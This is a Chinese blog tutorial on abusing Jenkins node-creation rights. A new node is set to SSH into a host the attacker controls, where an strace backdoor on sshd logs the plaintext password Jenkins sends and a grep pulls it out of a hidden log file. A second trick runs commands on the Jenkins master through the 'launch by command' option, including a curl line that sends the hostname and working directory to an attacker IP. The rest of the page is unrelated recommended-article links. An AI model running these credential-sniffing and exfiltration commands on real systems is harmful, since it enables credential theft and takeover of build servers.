Jenkins :添加node权限获取凭据、执行命令

最新推荐文章于 2024-03-31 08:33:51 发布
最新推荐文章于 2024-03-31 08:33:51 发布
阅读量374 收藏
点赞数
文章标签: jenkins servlet java nginx web安全 网络 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhrj/article/details/132866239
版权

拥有Jenkins agent权限的账号可以对node节点进行操作,通过添加不同的node可以让流水线项目在不同的节点上运行,安装Jenkins的主机默认作为master节点。

1693206336_64ec47407d15d193c5422.png!small?1693206336902

1.Jenkins 添加node获取明文凭据

通过添加node节点,本地监听ssh认证,选则凭据(明文)进行ssh认证,拿到密码。

1.新建节点-manage nodes功能

1693205859_64ec45635aa079a5ec1b6.png!small?1693205859758

1693205872_64ec45700bc3f13e1572b.png!small?1693205872433

2.填写工作目录,选择通过SSH进行远程节点身份认证,选择抓取带*号的凭据,host key选择不进行验证:

1693205887_64ec457f8281bcac13859.png!small?1693205887940

3.主机监听:这里监听主机ssh使用的是strace后门,实际也可以使用其他方式进行:

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

4.保存节点配置, Jenkins将对主机进行ssh请求:

1693205950_64ec45be79b8523c71e55.png!small?1693205950910

node节点认证日志(账号密码方式):

1693205961_64ec45c94123ffd95eb8d.png!small?1693205961786

5. 查看接受结果,这种方式获得的密码需要自行判断下起始位置

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

1693205976_64ec45d806a0b35142d02.png!small?1693205976368

2.通过添加节点执行命令

同样的,在添加节点时可以配置在master上执行命令去进行其他节点认证,也就可以在master上执行恶意命令了。

注意:这里执行curl命令时不能使用``直接执行系统命令,所以利用时需要更换其他方式。

curl -k ip:9090/`hostname`/`pwd`
env

添加节点时也可以从控制器执行命令,Launch method 选择 通过在master上执行命令的方式:

1693205993_64ec45e98a52e744062bf.png!small?1693205994177

保存然后launch agent:

1693206122_64ec466a0280b1d06eaf0.png!small?1693206122365

可以在Log里面看到命令env的输出:

1693206115_64ec46630c4a99a6e864e.png!small?1693206115957

工程款啥时候才能下来
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins构建(7): jenkins执行shell命令(本地和远程执行)
fen_fen的专栏
12-22 2万+
jenkins执行shell命令 执行本地命令或shell脚本 执行本地的一个脚本 3.执行远程机器命令或shell脚本 3.1.ssh 插件要安装好配置ssh权限 3.2.点击“系统管理”-->“系统配置”, 添加权限(这里使用的是用户密码)后,点击check connection,Successfull connection代表连接成功。 4.执行远程机器10.1.1.74的shell脚本 test.sh #!/bin/bash cd /home/cg pwd e
Jenkins远程连接Windows执行命令
古代宇航员的博客
06-21 4357
我在一台linux服务器上安装了Jenkins服务作为Jenkins服务器,除此之外,还有一台Windows电脑,安装了python环境,本地保存着自动化测试用的python代码,这台电脑用于执行基于chrome浏览器的自动化web测试。2台机器都处在同一个网络里。现在想要达到的效果是,利用Jenkins的定时构建任务,让Windows电脑能够定时地执行自动化测试,并返回结果,不需要人为的手动点击运行。
jenkins常用脚本命令
唯坚韧者始能遂其志
02-22 682
设置jenkins的时间和删除构建历史的脚本命令
Jenkins 创建一个 job , 用于单独执行脚本
sun0322
07-11 3494
===
Jenkins 相关命令
一个会搜索的程序员
06-27 2358
【代码】Jenkins 相关命令
Node-Jenkins:JenkinsNode Js集成
03-04
`scripts`字段可以配置npm命令,例如`start`、`build`和`test`,这些命令将在Jenkins执行。 集成步骤如下: 1. **安装Jenkins**: 在服务器上安装Jenkins,可以通过官方推荐的安装方式或者通过包管理器(如apt-...
Python-jenkins模块获取jobs的执行状态操作
01-20
1 获取jobs的当前任务状态 server_1 = jenkins.Jenkins(...获取最后一次完成(不包括执行中的)的job任务执行number: server_1.get_job_info(‘2019/get_node_list’)[‘lastCompletedBuild’][‘number’]
docker-jenkins-node:Jenkins NodeAgent运行Docker容器
03-10
在Docker容器中运行的Jenkins Node / Agent 这对于轻松旋转jenkins代理很有用,而无需在裸机主机上...使用以下命令Jenkins添加一些SSH凭据: 用户名: jenkins SSH密钥: jenkins节点配置示例: 注意事项 由于此方
node-jenkins:Jenkins CI 构建服务器的 API
06-11
var Jenkins = require ( 'node-jenkins' ) ; var jenkins = new Jenkins ( 'http://jenkins.org' ) ; jenkins . lastBuildInfo ( 'ibl' , function ( err , buildInfo ) { if ( err ) return console . error ( ...
jenkins的withCredentials方法读取用户凭据, 但是在sh命令中密码没隐藏的解决方法,神奇的单引号
Kainx
10-27 2450
jenkins的withCredentials方法读取用户凭据, 但是在sh命令中密码没隐藏的解决方法, 神奇的单引号
Jenkins相关命令
高性价比服务器就选:蓝易云
07-26 2154
查看Jenkins服务器状态:可以使用以下命令来查看Jenkins服务器的运行状态。重启Jenkins服务器:如果需要重新启动Jenkins服务器,可以使用以下命令。查看Jenkins服务器日志:要查看Jenkins服务器的日志,可以使用以下命令。停止Jenkins服务器:如果需要停止Jenkins服务器,可以使用以下命令。这将显示Jenkins服务器的当前状态,包括是否正在运行以及相关的进程信息。启动Jenkins服务器:使用以下命令启动Jenkins服务器。这将停止正在运行的Jenkins服务器进程。
Jenkins常用命令
qq_36521848的博客
08-17 1620
Jenkins常用命令
Jenkins执行策略(图文讲解)
最新发布
python全栈
03-31 3326
1、定时任务表达式:Jenkins使用一种特定的表达式来定义定时任务的执行时间和频率。这个表达式被称为Cron表达式,它由5个或6个字段组成,分别表示分钟、小时、日期、月份和星期几。通过设置这些字段的值,可以实现各种不同的定时任务调度。【构建触发器】中勾选其他工程构建后触发,并输入关注的项目。名字随意命名,英文即可,例如testwebhook。【构建触发器】中勾选定时构建,并输入时间格式。星期几(0-7,其中0和7都表示星期日)一般情况下:勾选只有构建稳定时触发。
Jenkins 执行Python脚本以及Bat(批处理)脚本
热门推荐
guorong520的博客
01-10 1万+
一、点击新建任务 二、创建任务 三、对刚才新建的任务进行配置 四、勾选参数化构建过程,可以添加字符参数、布尔值参数等。用于向python脚本传参数。 五、构建中点击增加构建步骤,选择执行windows批处理命令,输入执行命令,然后点击保存。 //输入执行命令 python gitlabOperate.py %buildVersion% %OA% %matrix% %publish% 六...
jenkins 设置参数和调用bat脚本
qq_32756581的博客
11-05 1855
例如 路径为:F:\Program Files (x86)\lua-5.4.4_Win64_bin\WorkSpace\DoTestLua.bat。3.然后在最后Build Steps 选Windows batch command 写对应bat代码。传入对应上面定义的参数名 例如: MyLuaVer 记得要%%包围传参过。选择你需要的参数类型 我这里选String Parameter。cd /d 后面输入指定需要执行文件的绝对路径。1.先创建一个 freeStyle。
node中怎么获取命令行中的参数
逆袭的菜鸟X
11-28 2539
从上面两个例子和官方文档中,我们可以得知argv的前两个参数都是固定的,在获取用户传入的参数我们需要process.argv.slice(2)一下,只获取从下标2开始的元素。process是nodejs内置的一个对象,该对象提供了当前有关nodejs进程的信息。(例如获取当前进程id,执行平台等与当前执行进程相关的对象和方法)
Jenkins: 执行 PowerShell 命令
weixin_40646872的博客
10-26 667
到目前为止,Jenkins 已经实现了对 PowerShell 的主流支持。期待 Jenkins 逐步的完善还存在的一些小问题,毕竟 MS 已经开始用 PowerShell 取代 bat 了。sparkdevsparkdev - 博客园。
Jenkins远程命令执行漏洞(CVE-2018-1000861)
黑白的博客
12-07 2760
声明 好好学习,天天向上 漏洞描述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 影
jenkins的基本使用
weixin_43202081的博客
05-05 1766
一.项目创建 点击新建任务,选择项目类型,常用自由风格的软件项目和流水线 二.基成shell命令 1.创建名为xxx的自由风格项目,可以在描述那里介绍下项目的概括内容用途,然后拉到最下面在构建那里点击增加构建步骤,选择shell命令,最后输入我们要执行的shell,还可以在其中使用一些环境变量 点击保存 点击保存之后,在项目界面点击立即构建 点击构建#1 的控制台输出,查看项目的输出结果 jenkins成功调用shell命令完成了任务。如果创建的文件没有指定路径,是默认存放在项目的工作目录中。 项目
jenkins(3): jenkins执行shell命令
05-23
Jenkins 可以执行 shell 命令,以下是一些示例: 1. 执行 Shell 脚本文件: ``` sh '/path/to/script.sh' ``` 2. 执行 Shell 命令: ``` sh 'echo "Hello World"' ``` 3. 执行多条 Shell 命令: ``` sh ''' ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值